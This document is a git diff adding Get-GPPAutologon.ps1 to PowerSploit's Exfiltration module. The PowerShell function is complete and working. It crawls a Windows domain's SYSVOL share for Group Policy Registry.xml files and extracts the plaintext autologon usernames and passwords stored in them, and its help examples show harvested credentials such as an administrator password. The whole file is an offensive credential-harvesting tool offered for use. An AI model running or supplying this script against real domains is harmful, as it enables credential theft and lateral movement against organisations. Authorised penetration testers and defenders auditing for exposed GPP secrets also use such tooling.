diff options
Diffstat (limited to 'Exfiltration/Get-GPPAutologon.ps1')
| -rw-r--r-- | Exfiltration/Get-GPPAutologon.ps1 | 139 |
1 files changed, 139 insertions, 0 deletions
diff --git a/Exfiltration/Get-GPPAutologon.ps1 b/Exfiltration/Get-GPPAutologon.ps1 new file mode 100644 index 0000000..6a6f55b --- /dev/null +++ b/Exfiltration/Get-GPPAutologon.ps1 @@ -0,0 +1,139 @@ +function Get-GPPAutologon +{ +<# +.SYNOPSIS + + Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences. + + PowerSploit Function: Get-GPPAutologon + Author: Oddvar Moe (@oddvarmoe) + Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work! + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + +.DESCRIPTION + + Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password. + +.EXAMPLE + + PS C:\> Get-GPPAutolgon + + UserNames File Passwords + --------- ---- --------- + {administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3} + {NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword} + + +.EXAMPLE + + PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq + + password + password12 + password123 + password1234 + password1234$ + read123 + Recycling*3ftw! + +.LINK + + https://support.microsoft.com/nb-no/kb/324737 +#> + + [CmdletBinding()] + Param () + + #Some XML issues between versions + Set-StrictMode -Version 2 + + #define helper function to parse fields from xml files + function Get-GPPInnerFields + { + [CmdletBinding()] + Param ( + $File + ) + + try + { + $Filename = Split-Path $File -Leaf + [xml] $Xml = Get-Content ($File) + + #declare empty arrays + $Password = @() + $UserName = @() + + #check for password and username field + if (($Xml.innerxml -like "*DefaultPassword*") -and ($Xml.innerxml -like "*DefaultUserName*")) + { + $props = $xml.GetElementsByTagName("Properties") + foreach($prop in $props) + { + switch ($prop.name) + { + 'DefaultPassword' + { + $Password += , $prop | Select-Object -ExpandProperty Value + } + + 'DefaultUsername' + { + $Username += , $prop | Select-Object -ExpandProperty Value + } + } + + Write-Verbose "Potential password in $File" + } + + #put [BLANK] in variables + if (!($Password)) + { + $Password = '[BLANK]' + } + + if (!($UserName)) + { + $UserName = '[BLANK]' + } + + #Create custom object to output results + $ObjectProperties = @{'Passwords' = $Password; + 'UserNames' = $UserName; + 'File' = $File} + + $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties + Write-Verbose "The password is between {} and may be more than one value." + if ($ResultsObject) + { + Return $ResultsObject + } + } + } + catch {Write-Error $Error[0]} + } + + try { + #ensure that machine is domain joined and script is running as a domain account + if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) { + throw 'Machine is not a domain member or User is not a member of the domain.' + } + + #discover potential registry.xml containing autologon passwords + Write-Verbose 'Searching the DC. This could take a while.' + $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml' + + if ( -not $XMlFiles ) {throw 'No preference files found.'} + + Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords." + + foreach ($File in $XMLFiles) { + $Result = (Get-GppInnerFields $File.Fullname) + Write-Output $Result + } + } + + catch {Write-Error $Error[0]} +}
\ No newline at end of file |